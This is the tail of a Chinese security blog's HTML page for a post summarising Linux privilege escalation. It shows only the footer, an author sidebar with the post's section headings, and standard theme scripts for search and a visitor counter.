      <strong>本文作者：</strong>
      RcoIl
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://rcoil.me/2016/12/Linux提权总结/" title="Linux提权总结">http://rcoil.me/2016/12/Linux提权总结/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/提权/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 提权</a>
          
            <a href="/tags/内网/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 内网</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/12/windows提权总结/" rel="next" title="windows提权总结">
                <i class="fa fa-chevron-left"></i> windows提权总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/12/文件包含/" rel="prev" title="文件包含">
                文件包含 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>


    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODE5NS80NzY4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="RcoIl" />
          <p class="site-author-name" itemprop="name">RcoIl</p>
           
              <p class="site-description motion-element" itemprop="description">好吃懒做，还有就是皮肤比黄皮果还黄！</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">43</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">10</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">24</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/RcoIl" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=rcoil@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-fa fa-envelope-open"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn/" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://kerlinglovsec.lofter.com/" title="kerling" target="_blank">kerling</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.agteam.net/" title="Fire-ant" target="_blank">Fire-ant</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xnianq.cn/" title="xniang" target="_blank">xniang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://thief.one/" title="nMask" target="_blank">nMask</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#辅助脚本"><span class="nav-number">2.</span> <span class="nav-text">辅助脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#LinEnum"><span class="nav-number">2.1.</span> <span class="nav-text">LinEnum</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Linuxprivchecker"><span class="nav-number">2.2.</span> <span class="nav-text">Linuxprivchecker</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Linux-Exploit-Suggester"><span class="nav-number">2.3.</span> <span class="nav-text">Linux Exploit Suggester</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Unix-Privesc-checker"><span class="nav-number">2.4.</span> <span class="nav-text">Unix-Privesc-checker</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用linux内核漏洞提权"><span class="nav-number">3.</span> <span class="nav-text">利用linux内核漏洞提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用低权限用户目录下可被Root权限用户调用的脚本提权"><span class="nav-number">4.</span> <span class="nav-text">利用低权限用户目录下可被Root权限用户调用的脚本提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用环境变量劫持高权限程序提权"><span class="nav-number">5.</span> <span class="nav-text">利用环境变量劫持高权限程序提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#前戏"><span class="nav-number">5.1.</span> <span class="nav-text">前戏</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#正文"><span class="nav-number">5.2.</span> <span class="nav-text">正文</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
<!--
    <i class="fa fa-heart"></i>
-->
	<i class="fa fa-address-card-o" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">RcoIl</span>
</div>
<!--

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-blind" aria-hidden="true"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-user-md" aria-hidden="true"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("KVNdpVifyFqJPx0bzSg6cN7z-gzGzoHsz", "vlNRwqLbdUTKC1W06gjYj0iG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
